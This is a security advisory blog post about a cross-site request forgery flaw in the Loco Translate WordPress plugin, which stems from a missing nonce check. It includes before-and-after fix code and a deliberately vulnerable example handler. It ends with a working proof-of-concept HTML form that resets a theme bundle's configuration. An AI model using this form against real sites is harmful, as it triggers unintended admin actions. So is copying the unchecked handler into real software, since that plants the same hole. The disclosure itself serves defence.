Developer of Million+ Install WordPress Plugin Discloses Security Vulnerability Without Making Update Available
A lot of things can go wrong when trying to fix vulnerabilities in WordPress plugins, and sometimes things go wrong in an intentional way. That is the case with a vulnerability in the 1+ million install WordPress plugin Loco Translate. A week ago, the developer submitted a change to the plugin that fixes a vulnerability in it. What they didn’t do was release a new version of the plugin, so those using the plugin cannot update to a fixed version. Sometimes developers forget to bump the version number of the plugin, causing that situation. Here, though, the developer is making changes to the plugin publicly before releasing a new version. That isn’t a good idea for security vulnerabilities, since it is possible to monitor for security changes, as we do, and notice such a situation.
In the submission to fix the vulnerability, the developer wrote “Fixed a missing security check – thanks Nosa Shandy.” The referenced security check is a nonce check, which prevents cross-site request forgery (CSRF). CSRF would allow an attacker to cause someone else to take an action they didn’t intend to. The vulnerability being fixed allowed that to occur when changing or resetting the advanced configuration options of a plugin or theme translation bundle from the plugin.
The issue was resolved in two places by adding a nonce check. Here is one of the lines before the check was added:
if( $post->has('conf') ){
And after:
if( $post->has('conf') && $this->checkNonce($nonce->action) ){
We checked for any similar code that still was vulnerable and we didn’t find any.
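To show the pattern the fix applies, here is an added illustration that is not Loco Translate’s own code: a hypothetical admin form handler for a “reset advanced configuration” action, first without and then with the nonce check, using WordPress core’s nonce API. The action name, option key and function names are assumptions for the example.

```php
<?php
// Added example, not Loco Translate's code. Shows the missing-nonce-check
// pattern and its fix in a hypothetical handler for a "reset advanced
// configuration" POST. Assumes WordPress core is loaded (wp_nonce_field,
// wp_verify_nonce, current_user_can, wp_die, delete_option are core functions).

const EXAMPLE_NONCE_ACTION = 'example_reset_conf';  // hypothetical action name
const EXAMPLE_OPTION       = 'example_bundle_conf'; // hypothetical option key

// Renders the legitimate form. wp_nonce_field() embeds a per-user, time-limited
// token that a page on another site cannot know, so a forged POST lacks it.
function example_render_form() {
    echo '<form method="post">';
    wp_nonce_field( EXAMPLE_NONCE_ACTION, '_example_nonce' );
    echo '<input type="submit" name="unconf" value="Reset advanced config" />';
    echo '</form>';
}

// BEFORE: the handler acts on any POST carrying "unconf". A logged-in admin
// whose browser submits such a form from an attacker-controlled page would
// reset the configuration without intending to (CSRF).
function example_handle_reset_vulnerable() {
    if ( isset( $_POST['unconf'] ) ) {
        delete_option( EXAMPLE_OPTION );
        return true;
    }
    return false;
}

// AFTER: the same handler with the nonce check the fix added, plus a capability
// check so the action is also limited to users allowed to manage options.
function example_handle_reset_fixed() {
    if ( ! isset( $_POST['unconf'] ) ) {
        return false;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }
    $nonce = isset( $_POST['_example_nonce'] )
        ? sanitize_text_field( wp_unslash( $_POST['_example_nonce'] ) )
        : '';
    // wp_verify_nonce() returns false for a missing, forged or expired token.
    if ( ! wp_verify_nonce( $nonce, EXAMPLE_NONCE_ACTION ) ) {
        wp_die( 'Security check failed (missing or invalid nonce).', 'Forbidden', array( 'response' => 403 ) );
    }
    delete_option( EXAMPLE_OPTION );
    return true;
}
```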
For the time being, anyone using the plugin who wants to protect their website from this vulnerability needs to download version 2.6.10 and replace the existing copy of the plugin.
Proof of Concept
The following proof of concept will reset the advanced configuration of the translation bundle for the Twenty Twenty-Four theme.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?bundle=twentytwentyfour&page=loco-theme&action=conf" method="POST">
<input type="submit" name="unconf" value="Submit" />
</form>
</body>
</html>